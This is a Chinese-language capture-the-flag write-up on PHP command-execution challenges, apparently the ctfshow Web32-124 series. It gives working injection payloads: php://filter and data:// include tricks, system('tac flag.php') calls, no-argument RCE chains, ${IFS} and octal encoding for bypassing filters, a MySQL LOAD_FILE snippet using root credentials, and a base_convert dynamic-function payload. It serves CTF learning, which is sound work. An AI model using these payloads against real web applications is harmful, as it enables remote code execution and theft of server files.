CTF Web 命令执行实战：从基础注入到高级绕过技巧

参数逃逸 (Web32-36)

当过滤条件限制了对特定函数的括号使用，但允许 include 时，可通过定义新变量实现逃逸。

Web32 过滤了括号和常用函数，利用 include 无需括号的特性，结合 php://filter 读取文件。 Payload 示例：

?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

Web33 可使用 data 伪协议。注意闭合语句避免被当作 PHP 解析。 Payload 示例：

?c=include%09$_GET[1]?>&1=data://text/plain,<?php system('tac flag.php');?>

Web34-36 思路同上，可结合日志注入。通过构造请求头或 POST 数据污染访问日志，再利用 include 包含日志文件执行 payload。

文件包含与伪协议

伪协议利用 (Web37-39)

Web37 存在文件包含漏洞，且支持 data 伪协议。可直接传入 PHP 代码。 Payload 示例：

?c=data://text/plain,<?php system("tac fla*")?>

Web38 过滤了 php 关键字，使用短标签 <?= ?> 绕过。 Payload 示例：

?c=data://text/plain,<?= system("tac fla*")?>

Web39 参数后自动拼接 .php。由于 include 执行完即返回，忽略后续字符串，payload 复用。

无参数与无字母 RCE

无参数 RCE (Web40)

当无法传入任何显式参数时，利用内置函数获取路径或内容。

核心技巧：

• localeconv(): 获取本地化信息，第一个元素通常是小数点。
• current(): 获取数组当前单元。
• scandir(): 扫描目录。

扫描目录：

?c=var_dump(scandir(current(localeconv())));

读取文件： 利用 array_reverse 反转数组指针，配合 show_source。

?c=show_source(next(array_reverse(scandir(current(localeconv())))));

无字母 RCE (Web41)

若连字母都被过滤，可利用位运算（如按位或 |）重组字符。编写脚本遍历 ASCII 码表，寻找可用字符组合出目标命令。

绕过无回显 RCE

逻辑运算符与重定向 (Web42-53)

题目将输出重定向至 /dev/null，需截断执行或使用逻辑运算符跳过重定向。

常见 Payload：

# 分号分隔
?c=tac flag.php;
# 逻辑或短路
?c=tac flag.php||
# 后台执行
?c=tac flag.php&

特殊绕过：

• Web45: 过滤空格，使用 %09 (Tab) 或 ${IFS}。
• Web46: 过滤数字，URL 编码绕过。
• Web47-49: 过滤百分号，利用转义符 \ 使字符失去特殊含义。
• Web50: 过滤 &，使用管道符 < 重定向输入。
• Web52: 过滤 < >，利用单引号拼接字符串特性。

高级过滤与字符集受限

关键词模糊匹配 (Web54)

正则表达式使用 .*c.*a.*t.* 匹配包含 c-a-t 顺序的字符串。策略是修改文件名，使其不包含敏感字符组合，例如将 flag.php 复制为 ccccc.txt。

字符集受限 (Web55-57)

Web55: 过滤字母，仅留数字和空格。使用八进制编码命令。 Payload 示例：

'\164\141\143' '\146\154\141\147\56\160\150\160'

Web56: 过滤字母、数字及特殊符号。利用 PHP 临时文件上传机制。上传包含命令的脚本，通过通配符匹配 /tmp/phpXXXXXX 执行。

Web57: 极度受限，仅允许 $, (, ) 等。利用 Shell 算术扩展 (()) 进行数学运算构造数字。 Payload 示例：

?c=$((~$(($((~$(())))...))) # 构造数字 36

黑盒过滤与 open_basedir

POST 参数过滤 (Web58-70)

针对 POST 传参的 eval 执行，若常规函数被禁，尝试文件读取函数如 highlight_file 或 readfile。若被禁，利用参数逃逸结合 php://filter。

目录限制 (Web71-72)

Web71: 输出混淆，所有字母数字替换为 ?。提前终止脚本执行（如 die()）可绕过替换规则。

Web72: open_basedir 限制操作目录。使用 glob:// 流包装器扫描目录，或利用 UAF (Use-After-Free) 漏洞劫持内存执行命令。

数据库与 FFI 利用

数据库读取 (Web75-76)

当文件读取受限，但存在数据库连接权限时，利用 MySQL 的 LOAD_FILE() 函数。 Payload 示例：

$c=try{$dbh=new PDO('mysql:host=localhost;dbname=information_schema','root','root');foreach($dbh->query('SELECT LOAD_FILE("/flag36.txt")')as$row){echo($row[0])."|";}$dbh=null;}catch(PDOException$e){echo$e->getMessage();};exit();

FFI 接口 (Web77)

PHP 7.4+ 引入 FFI 功能，可直接调用 C 语言函数。利用 SUID 权限的文件（如 readflag）以 root 权限执行命令。

环境变量与白名单函数

环境变量拼接 (Web118-122)

通过提取环境变量中的特定字符（如 ${PWD:~A} 取最后一个字符）拼接命令。利用 Shell 的特殊变量（如 $?, $#, $IFS）绕过过滤。

白名单函数利用 (Web124)

题目仅允许数学函数。利用 base_convert 进行进制转换构造字符串，结合动态函数调用 $$pi{abs}(...) 绕过黑名单。

Payload 示例：

?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{abs}($$pi{acos})&abs=system&acos=cat f*

以上涵盖了从基础注入到复杂环境下的命令执行绕过方案。实际解题中需灵活组合多种技巧，关注代码细节与环境差异。